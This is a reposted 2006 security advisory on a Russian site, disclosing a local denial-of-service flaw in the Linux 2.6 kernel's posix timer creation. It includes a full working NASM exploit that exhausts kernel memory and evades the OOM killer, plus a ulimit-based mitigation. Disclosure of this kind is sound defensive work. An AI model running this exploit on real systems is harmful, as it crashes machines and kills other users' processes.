Уязвимости

Linux Kernel Local DoS vulnerability

11 апреля, 2006

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello.
I'd like to present one of Linux Kernel vulnerabilities. As far as I
know, this one affects 2.6.x kernels.

Problem
- --

The problem lies in sys_timer_create() in Linux/kernel/posix-timers.c.
Each time user creates a posix timer, some kernel memory is allocated.
Since count of timers that can be created by user is limited only by
sigqueue size (ex. 4294967295 in Debian) every local user can exhaust
all avaible memory which will trigger oom_killer (mm/oom_kill.c). If a
process itself uses a small amount of memory, it's oom_score will be
low, so all other processes would be killed.

Exploit
- --

- --------------8<---------------------

;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29
       int     0x80
       ret
create_threads:
       mov     eax,2
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
loopek:
       mov     eax,259
       mov     ebx,0
       mov     ecx,0
       mov     edx,esp
       int     0x80
       jmp     loopek
done:
       xor     ebx,ebx
       mov     eax,1
       int     0x80


- --------------8<--------------------


Fix
- --
In my opinion the easiest way to defend is to enforce pending signals
queue size rlimit (ulimit -i).

Vendor notification status
- --
Vendor refused to fix this kind of bugs.


- --
Regards,
fingerout
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEMwAY3AGvlpYpo4cRApESAJ9PPyZaHz5HExrh15pQdH51I3di+wCfee87
hqrfQZpKiyqugdZoabAHy9g=
=9y9Y
-----END PGP SIGNATURE-----

Дата создания: 11.04.2006 03:25:55
Дата изменения: 11.04.2006 03:25:55
Количество показов: 1955

                                                                                                                                                                                                                                               

Блоги
03.02.2012
Verisign взломали
Вот такие вот новости. Пока без деталей.


03.02.2012
Вышел новый номер журнала (IN)SECURE
33-ий выпуск одного из самых качественных журналов в нашей отрасли уже доступен для скачивания тут.В ...


02.02.2012
Обновление TDL4: Purple Haze all in my brain
Purple haze all in my brainLately things just don't seem the sameActin' funny, but I don' ...


02.02.2012
Посредники
Информационные технологии вообще и Интернет в частности должны приводить ко спрямлению социально-эко ...


02.02.2012
Продвижение СЗИ
   Компании, желающие продвигатьсвои средства защиты информации (СЗИ), имеют возможность р ...


01.02.2012
Тестирование на уязвимости веб-приложений
На мой взгляд тестирование веб-приложений - одна из наиболее перспективных тем в области проведения ...


01.02.2012
Открытое запретное
Выражение «взято из открытых источников» или «из общедоступных источников» п ...


01.02.2012
И вновь об УЭК
Про универсальную электронную карту я уже писалне раз. И вот пару недель назад на сайте Минкомсвязи ...


01.02.2012
Новая версия курса по персданным
Вообще несмотря на отсутствие серьезных новостей в части законодательства по персданным, курс все ра ...


01.02.2012
Что ищут в Yandex хакеры?
Нет, это не статистика поисковых запросов настоящих элитный хакеров.Это Юра Гольцеврассказывает об у ...